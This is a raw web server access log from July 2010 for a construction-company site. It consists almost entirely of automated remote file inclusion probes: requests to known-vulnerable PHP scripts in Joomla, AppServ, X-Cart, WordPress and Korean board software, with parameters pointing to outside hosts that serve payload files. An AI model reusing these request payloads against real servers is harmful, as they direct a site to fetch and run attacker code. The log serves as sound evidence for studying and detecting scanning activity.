92.60.176.46 - - [01/Jul/2010:07:15:02 -0700] "GET /logs/access_100501.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:15:02 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:15:02 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:15:14 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:15:14 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:15:14 -0700] "GET /logs/access_100501.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:17:13 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:17:13 -0700] "GET /logs/access_100601.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:17:13 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:17:42 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:17:42 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:17:42 -0700] "GET /logs/access_100601.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.171.37.206 - - [01/Jul/2010:07:18:41 -0700] "GET /logs/access_100601.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:20:54 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:20:55 -0700] "GET /logs/access.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:20:55 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:21:12 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:21:12 -0700] "GET /logs/access.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:21:12 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:22:19 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:22:19 -0700] "GET /logs/access_100601.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:22:19 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:22:53 -0700] "GET /logs/access_100601.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:22:53 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:07:22:54 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:10 -0700] "GET /logs/access_100331.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:10 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:10 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:23 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.141.196.221 - - [01/Jul/2010:07:24:26 -0700] "GET /logs/access_100531.log//login.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
114.141.196.221 - - [01/Jul/2010:07:24:27 -0700] "GET /login.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
114.141.196.221 - - [01/Jul/2010:07:24:27 -0700] "GET /logs//login.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:30 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:55 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:55 -0700] "GET /logs/access_100331.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:55 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:24:59 -0700] "GET /logs//mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:24:59 -0700] "GET /mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:24:59 -0700] "GET /logs/access.log//mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:24:59 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:25:00 -0700] "GET /mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:25:00 -0700] "GET /logs/access.log//mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:25:00 -0700] "GET /logs//mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:25:04 -0700] "GET /logs/access.log//mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:25:04 -0700] "GET /logs//mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:07:25:04 -0700] "GET /mwchat/libs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:25:10 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:07:29:30 -0700] "GET /logs/access_100601.log/Bisexual/board/bbs/write_update.php/SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:07:29:30 -0700] "GET /Bisexual/board/bbs/write_update.php/SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:07:29:30 -0700] "GET /logs/Bisexual/board/bbs/write_update.php/SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:33:08 -0700] "GET /logs/access_100601.log//skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:07:37:08 -0700] "GET /logs/access_100601.log%20%20/Bisexual/board/bbs/write_update.php/SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.141.196.221 - - [01/Jul/2010:07:42:24 -0700] "GET /logs/access_100601.log//login.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
114.141.196.221 - - [01/Jul/2010:07:42:24 -0700] "GET /login.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
114.141.196.221 - - [01/Jul/2010:07:42:25 -0700] "GET /logs//login.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
195.56.55.217 - - [01/Jul/2010:07:44:07 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
195.56.55.217 - - [01/Jul/2010:07:44:07 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
67.195.111.182 - - [01/Jul/2010:07:44:48 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.de-construction.com"
67.195.111.182 - - [01/Jul/2010:07:45:35 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.de-construction.com"
85.214.105.99 - - [01/Jul/2010:07:50:35 -0700] "GET /skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.214.105.99 - - [01/Jul/2010:07:50:35 -0700] "GET /logs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.214.105.99 - - [01/Jul/2010:07:50:37 -0700] "GET /logs/access.log//skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:52:08 -0700] "GET /logs/access_100601.log//skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:53:52 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:53:52 -0700] "GET /admin/auth.php?xcart_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:53:52 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
116.50.163.106 - - [01/Jul/2010:07:54:43 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
195.56.55.217 - - [01/Jul/2010:07:55:17 -0700] "GET /logs/access_100601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:58:02 -0700] "GET /admin/auth.php?xcart_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:58:02 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:58:02 -0700] "GET /logs/access_100601.log%20%20//admin/auth.php?xcart_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.56.55.217 - - [01/Jul/2010:07:58:51 -0700] "GET /logs/access_100501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:02:35 -0700] "GET /logs/access_100601.log%20%20//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:02:35 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:02:35 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:02:53 -0700] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:02:53 -0700] "GET /logs/access_100601.log%20%20//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:02:54 -0700] "GET /appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:08:09:30 -0700] "GET /logs/write_update.php?board_skin_path=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:08:09:30 -0700] "GET /write_update.php?board_skin_path=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:08:09:30 -0700] "GET /logs/access_100601.log%20%20/write_update.php?board_skin_path=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:08:11:49 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:08:11:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:08:11:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:08:11:55 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:08:11:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:08:11:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:08:16:58 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/test? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:08:16:58 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/test? HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:08:16:58 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/test? HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:08:16:58 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/test? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:08:25:18 -0700] "GET /logs/access_100601.log/write_update.php?board_skin_path=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:27:19 -0700] "GET /logs/access_100531.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:08:27:22 -0700] "GET /logs/access_100531.log//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:08:41:01 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:08:41:01 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:08:41:04 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head???? HTTP/1.1" 200 1372 "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:08:49:27 -0700] "GET /logs/scripts.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:08:49:28 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:08:49:30 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:08:50:41 -0700] "GET /logs/access_100531.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
116.50.163.106 - - [01/Jul/2010:08:52:23 -0700] "GET /logs/access_100601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
116.50.163.106 - - [01/Jul/2010:08:52:23 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
116.50.163.106 - - [01/Jul/2010:08:52:24 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:09:00:52 -0700] "GET /modifyform.html?code=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:09:00:52 -0700] "GET /logs/modifyform.html?code=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:09:00:52 -0700] "GET /logs/access_100601.log%20%20/modifyform.html?code=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.205.252.4 - - [01/Jul/2010:09:04:15 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://www.soundlayers.com/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
